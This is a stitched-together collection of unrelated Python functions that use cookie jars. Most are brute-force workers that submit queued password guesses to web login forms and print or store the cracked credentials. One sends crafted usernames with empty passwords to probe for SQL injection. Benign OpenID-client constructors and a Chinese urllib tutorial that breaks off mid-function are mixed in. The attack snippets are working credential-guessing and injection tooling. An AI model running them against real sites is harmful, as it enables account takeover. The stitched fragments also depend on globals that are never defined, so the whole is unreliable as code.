def webAuthCracker(q, username):
    """Worker loop: submit the login form once per candidate password in ``q``.

    Each pass fetches ``targeturl`` through a fresh cookie-handling opener,
    feeds the page to ``myHTMLParser`` to collect form inputs, fills in
    ``username_field`` / ``pass_field`` and POSTs the urlencoded form to
    ``targetpost``.  An attempt counts as a hit when the module-level
    ``check`` string occurs in the response body; the shared ``isBingo``
    flag is then set so every worker leaves its loop.

    Seen from the server, one guess is a GET of the login page followed
    directly by a POST that replays whatever inputs the parser collected,
    with no cookies carried over between guesses.  That request pairing is
    what per-account and per-source attempt limits have to key on.

    :param q: queue of candidate passwords, one per entry (trailing
        whitespace is stripped)
    :param username: account name submitted with every candidate
    """
    global isBingo
    while True:
        if q.empty() or isBingo:
            break
        candidate = q.get().rstrip()

        # The 'cookies' filename is never loaded or saved in this function,
        # so the jar only lives in memory for this single attempt.
        jar = cookielib.FileCookieJar('cookies')
        opener = build_opener(HTTPCookieProcessor(jar))
        login_page = opener.open(targeturl).read().decode()

        print('+++TRYING %s: %s' % (username, candidate))

        form_parser = myHTMLParser()
        form_parser.feed(login_page)
        form_fields = form_parser.tagResult
        form_fields[username_field] = username
        form_fields[pass_field] = candidate

        payload = urlencode(form_fields).encode('utf-8')
        reply = opener.open(targetpost, data=payload).read().decode()

        if check not in reply:
            continue
        isBingo = True
        print('---CRACKING SUCCESS!')
        print('---Username[%s] Password[%s]' % (username, candidate))
        print('---Waiting Other Threads Terminated..')
def web_bruter(self):
    """Worker loop: try each queued password against the login form.

    Runs until ``self.password_q`` is empty or ``self.found`` is set.  For
    every candidate it fetches ``target_url``, lets ``BruteParser`` collect
    the form fields, overwrites ``username_field`` / ``password_field`` and
    POSTs the urlencoded result to ``target_post``.  Success is declared
    when ``success_check`` occurs in the response body.

    On the wire each guess is a GET of the form page immediately followed
    by a POST, each with an empty cookie jar, which is the signature a
    login-attempt limiter or detection rule would see.
    """
    while True:
        if self.password_q.empty() or self.found:
            break
        guess = self.password_q.get().rstrip()

        # Fresh jar per attempt; the "cookies" filename is never loaded or
        # saved here, so nothing persists between guesses.
        cookie_store = cookielib.FileCookieJar("cookies")
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_store))
        page = opener.open(target_url).read()

        print("Trying: %s : %s (%d left)" % (self.username, guess, self.password_q.qsize()))

        # Collect the form's fields (hidden ones included, per the original
        # comment), then set the two credential fields.
        form_parser = BruteParser()
        form_parser.feed(page)
        form_fields = form_parser.tag_results
        form_fields[username_field] = self.username
        form_fields[password_field] = guess

        encoded_form = urllib.urlencode(form_fields)
        login_result = opener.open(target_post, encoded_form).read()

        if success_check not in login_result:
            continue
        self.found = True
        print("[*] Bruteforce successful.")
        # NOTE(review): this reads a bare `username`, not self.username, so
        # it depends on a module-level name that is not visible here.
        print("[*] Username: %s" % username)
        print("[*] Password: %s" % guess)
        print("[*] Waiting for other threads to exit...")
def web_bruter(self):
    """Worker loop: try each queued password against ``self.target_post``.

    Runs until ``self.password_q`` is empty or ``self.find`` is set.  Queue
    entries are bytes; each is decoded and has trailing newlines removed.
    The form page at ``self.target_url`` is fetched and parsed with
    ``BruteParser``, the ``username_tag`` / ``password_tag`` fields are set,
    and the urlencoded form is POSTed.

    The success test never looks at the response body: an attempt counts as
    a hit when the response's ``Content-Length`` header differs from the
    hard-coded value 34, which the original author marks as target-specific.
    On a hit the credentials are printed and handed to ``DB(...).burstdb()``.

    NOTE(review): indentation was rebuilt from a collapsed listing; the
    ``DB`` call is assumed to belong to the success branch -- confirm.
    """
    while True:
        if self.password_q.empty() or self.find:
            break
        # Strip the trailing newline from the decoded queue entry.
        brute = self.password_q.get().decode().rstrip('\n')

        # New jar per attempt; the "cookies" file is never loaded or saved
        # here, so no session state survives between guesses.
        cookie_store = cookiejar.FileCookieJar("cookies")
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_store))
        page = opener.open(self.target_url).read()

        print("爆破用户:%s ------> 尝试密码:%s -------> 剩余密码数:%s" %(self.username,brute,self.password_q.qsize()))

        form_parser = BruteParser()
        form_parser.feed(page.decode())
        # tag_results holds the collection of tags gathered by the parser.
        form_fields = form_parser.tag_results
        form_fields[username_tag] = self.username
        form_fields[password_tag] = brute

        encoded_form = urlencode(form_fields)
        login_response = opener.open(self.target_post, encoded_form.encode())

        # This step varies by target: only the header is inspected, and a
        # missing Content-Length makes int() raise.
        reply_headers = login_response.headers
        reply_length = int(reply_headers["Content-Length"])

        if reply_length == 34:
            continue
        self.find = True
        print("恭喜爆破成功!!!")
        print("用户名%s它的密码为:%s" %(self.username,brute))
        print("等待爆破线程退出........")
        # The recovered credential is passed on in clear text.
        db = DB(self.target_url, self.username, brute)
        db.burstdb()
def __init__(self, options, submitted):
    """Store the run options and install a cookie-aware default opener.

    :param options: object exposing at least a ``site`` attribute, which is
        interpolated into the "maybe down" message
    :param submitted: stored unchanged on the instance
    """
    self.options = options
    self.submitted = submitted
    self._maybe_down_message = (
        'Perhaps the connection was interupted or %s is down.'
        % self.options.site
    )

    # No filename is given, so cookies are held in memory only; the base
    # FileCookieJar class cannot save() them in any case.
    jar = cookiejar.FileCookieJar()
    cookie_handler = urlrequest.HTTPCookieProcessor(jar)
    # install_opener replaces the process-wide default opener: every later
    # urlopen() call in this process shares this one cookie jar.
    urlrequest.install_opener(urlrequest.build_opener(cookie_handler))
def __init__(self, verify_ssl=True, keyjar=None, client_cert=None, timeout=5):
    """
    Set up key storage, cookie storage and the default request arguments.

    :param verify_ssl: Control TLS server certificate validation. ``True``
        validates against the global settings, ``False`` performs no
        validation at all. A filename is used as a certificate bundle in
        openssl format, a directory name as a CA directory in openssl
        format.
    :param keyjar: Store for the keys used to sign/encrypt messages. A
        default ``KeyJar`` is created when the argument is falsy.
    :param client_cert: Client-side certificate: either one file holding
        both the private key and the certificate, or a tuple with the two
        file paths.
    :param timeout: Timeout handed to the ``requests`` library, as a single
        integer or a tuple of integers (see the ``requests``
        documentation).
    """
    if not keyjar:
        # The default key jar follows the same TLS verification setting.
        keyjar = KeyJar(verify_ssl=verify_ssl)
    self.keyjar = keyjar

    # No filename: cookies live in memory for the life of this instance.
    self.cookiejar = cookielib.FileCookieJar()

    # Extra keyword arguments for every call into the requests library.
    # Redirects are not followed automatically, and `verify` carries the
    # caller's choice through unchanged, so verify_ssl=False switches
    # certificate validation off for all of these requests.
    self.request_args = dict(
        allow_redirects=False,
        cert=client_cert,
        verify=verify_ssl,
        timeout=timeout,
    )

    # Event collector (tracing) and request callback start out unset.
    self.events = self.req_callback = None
def webAuthCracker(username):
    """Submit the login form once with ``username`` and an empty password.

    The form page at ``targeturl`` is fetched and parsed with
    ``myHTMLParser``; ``username_field`` is set to the argument and
    ``pass_field`` to the empty string before the form is POSTed to
    ``targetpost``.  If the module-level ``check`` string shows up in the
    response, the attempt is reported under the label "SQL INJECTION",
    so ``username`` is presumably a crafted test string rather than a
    real account name.

    A login handler that binds the username as a query parameter should
    never return the ``check`` marker for a request with an empty password.

    :param username: value placed in the username form field
    """
    password = ''

    # The 'cookies' filename is never loaded or saved in this function, so
    # the jar is effectively in-memory for this single request pair.
    jar = cookielib.FileCookieJar('cookies')
    opener = build_opener(HTTPCookieProcessor(jar))
    login_page = opener.open(targeturl).read().decode()

    print('+++TRYING %s: %s' %(username, password))

    form_parser = myHTMLParser()
    form_parser.feed(login_page)
    form_fields = form_parser.tagResult
    form_fields[username_field] = username
    form_fields[pass_field] = password

    payload = urlencode(form_fields).encode('utf-8')
    reply = opener.open(targetpost, data=payload).read().decode()

    if check not in reply:
        return
    print('---CRACKING SUCCESS!')
    print('---SQL INJECTION [%s]' %username)
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename,
          socks_proxy, scan_id, scan_cmd):
    """Try one username/password pair against an HTML login form.

    The form page is fetched from ``target``, the credential fields named
    "username" and "password" are filled in, and the urlencoded form is
    POSTed to ``target:port``.  A response code of 200 is the only success
    criterion; the response body is never inspected.

    Returns 0 when the POST answers with code 200 (after writing the result
    to ``log_in_file`` and '0' to ``thread_tmp_filename``), the unchanged
    flag value 1 for any other code that does not raise, and 1 once the
    failure counter reaches ``retries``.

    NOTE(review): indentation was rebuilt from a collapsed listing; the
    nesting of the two ``__log_into_file`` calls under ``if flag is 0`` is
    assumed -- confirm against the original file.
    """
    username_field = "username"
    password_field = "password"
    # Failure counter; note that the name shadows the builtin `exit`.
    exit = 0

    class BruteParser(HTMLParser):
        """Record whether the page has inputs named after the credential fields."""

        def __init__(self):
            HTMLParser.__init__(self)
            self.parsed_results = {}

        def handle_starttag(self, tag, attrs):
            # Only <input name="username"> / <input name="password"> are
            # recorded; the stored value is the field name itself and is
            # overwritten with the real credential further down.
            if tag == "input":
                for name, value in attrs:
                    if name == "name" and value == username_field:
                        self.parsed_results[username_field] = username_field
                    if name == "name" and value == password_field:
                        self.parsed_results[password_field] = password_field

    if socks_proxy is not None:
        socks_version = socks.SOCKS5 if socks_proxy.startswith(
            'socks5://') else socks.SOCKS4
        socks_proxy = socks_proxy.rsplit('://')[1]
        if '@' in socks_proxy:
            # Proxy string with credentials: user:password@host:port
            socks_username = socks_proxy.rsplit(':')[0]
            socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
            socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
                                    int(socks_proxy.rsplit(':')[-1]), username=socks_username,
                                    password=socks_password)
            # These assignments rebind attributes of the `socket` module
            # itself, so they are not limited to this call or this thread.
            socket.socket = socks.socksocket
            socket.getaddrinfo = getaddrinfo
        else:
            socks.set_default_proxy(socks_version, str(
                socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
            # Same module-level rebinding as in the branch above.
            socket.socket = socks.socksocket
            socket.getaddrinfo = getaddrinfo
    while 1:
        # The POST goes to "target:port"; the GET below uses `target` alone.
        target_host = str(target) + ":" + str(port)
        # 1 = not (yet) successful, 0 = success.
        flag = 1
        try:
            # NOTE(review): assigning to `cookiejar` makes the name local to
            # login(), so the right-hand side is read before it is bound and
            # raises UnboundLocalError; the bare except below then counts it
            # as a failed attempt.
            cookiejar = cookiejar.FileCookieJar("cookies")
            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(cookiejar))
            response = opener.open(target)
            page = response.read()
            parsed_html = BruteParser()
            parsed_html.feed(page)
            parsed_html.parsed_results[username_field] = user
            parsed_html.parsed_results[password_field] = passwd
            post_data = urllib.urlencode(parsed_html.parsed_results).encode()
        except:
            # Bare except: network errors, parse errors and programming
            # errors are all treated alike as one failed attempt.
            exit += 1
            # NOTE(review): `is` compares object identity, not value; for
            # ints this matches `==` only where the interpreter reuses the
            # same object.
            if exit is retries:
                warn(messages(language, "http_form_auth_failed").format(
                    target, user, passwd, port))
                return 1
            else:
                time.sleep(time_sleep)
                continue
        try:
            if timeout_sec is not None:
                brute_force_response = opener.open(
                    target_host, data=post_data, timeout=timeout_sec)
            else:
                brute_force_response = opener.open(target_host, data=post_data)
            # Success is decided on the status code alone, so a form that
            # answers 200 with an error page is reported as a valid login.
            if brute_force_response.code == 200:
                flag = 0
            if flag is 0:
                info(messages(language, "http_form_auth_success").format(
                    user, passwd, target, port))
                # The result record holds the username and password in
                # clear text and is appended to `log_in_file`.
                data = json.dumps(
                    {'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'http_form_brute',
                     'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute",
                     'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
                __log_into_file(log_in_file, 'a', data, language)
                __log_into_file(thread_tmp_filename, 'w', '0', language)
            return flag
        except:
            # Same retry accounting as for the form fetch above.
            exit += 1
            if exit is retries:
                warn(messages(language, "http_form_auth_failed").format(
                    target, user, passwd, port))
                return 1
            else:
                time.sleep(time_sleep)
                continue
def __init__(
    self,
    verify_ssl=None,
    keyjar=None,
    client_cert=None,
    timeout=None,
    settings: PyoidcSettings = None,
):
    """
    Set up settings, key storage, cookie storage and request arguments.

    Keyword Args:
        settings
            Instance of :class:`PyoidcSettings` with configuration options.
            A default instance is created when the argument is falsy.

    ``verify_ssl``, ``client_cert`` and ``timeout`` are deprecated in
    favor of ``settings``. Each one that is not ``None`` emits a
    ``DeprecationWarning`` and is written onto the settings object in
    use, including one supplied by the caller.

    :param verify_ssl: Control TLS server certificate validation. ``True``
        validates against the global settings, ``False`` performs no
        validation at all. A filename is used as a certificate bundle in
        openssl format, a directory name as a CA directory in openssl
        format.
    :param keyjar: Store for the keys used to sign/encrypt messages. A
        default ``KeyJar`` is created when the argument is falsy.
    :param client_cert: Client-side certificate: either one file holding
        both the private key and the certificate, or a tuple with the two
        file paths.
    :param timeout: Timeout handed to the ``requests`` library, as a single
        integer or a tuple of integers (see the ``requests``
        documentation).
    """
    self.settings = settings or PyoidcSettings()

    # Fold the deprecated keyword arguments into the settings object, in
    # the order verify_ssl, client_cert, timeout.
    deprecated_args = (
        ("verify_ssl", verify_ssl),
        ("client_cert", client_cert),
        ("timeout", timeout),
    )
    for arg_name, arg_value in deprecated_args:
        if arg_value is None:
            continue
        warnings.warn(
            "`%s` is deprecated, please use `settings` instead if you need to set a non-default value."
            % arg_name,
            DeprecationWarning,
            stacklevel=2,
        )
        setattr(self.settings, arg_name, arg_value)

    if not keyjar:
        # The default key jar follows the effective TLS verification setting.
        keyjar = KeyJar(verify_ssl=self.settings.verify_ssl)
    self.keyjar = keyjar

    # No filename: cookies live in memory for the life of this instance.
    self.cookiejar = cookielib.FileCookieJar()

    # Extra keyword arguments for every call into the requests library.
    # Redirects are not followed automatically; `verify` mirrors the
    # settings, so verify_ssl=False there switches certificate validation
    # off for all of these requests.
    self.request_args = dict(
        allow_redirects=False,
        cert=self.settings.client_cert,
        verify=self.settings.verify_ssl,
        timeout=self.settings.timeout,
    )

    # Event collector (tracing) and request callback start out unset.
    self.events = self.req_callback = None
from urllib import request,parse from http import cookiejar # 创建cookie实例 cookie = cookiejar.CookieJar() file = cookiejar.FileCookieJar() mozilla = cookiejar.MozillaCookieJar() lwp = cookiejar.LWPCookieJar() # 创建cookie管理器 cookie_Headle = request.HTTPCookieProcessor(cookie) # 创建http请求管理器 http_Headle = request.HTTPHandler() # 生成https管理器 https_Headle = request.HTTPSHandler() # 创建请求管理器 oper = request.build_opener(http_Headle,https_Headle,cookie_Headle) ''' 进行登录操作 登录完成后,将请求返回的handle信息将由请求管理器保存,可以重复使用 在请求管理器生命周期结束后,所有的hanlder信息自动销毁 ''' def test01(url): data = { # 用户名,密码,验证码 "email":"*****@*****.**", "password":"******" # "icode":"" } try: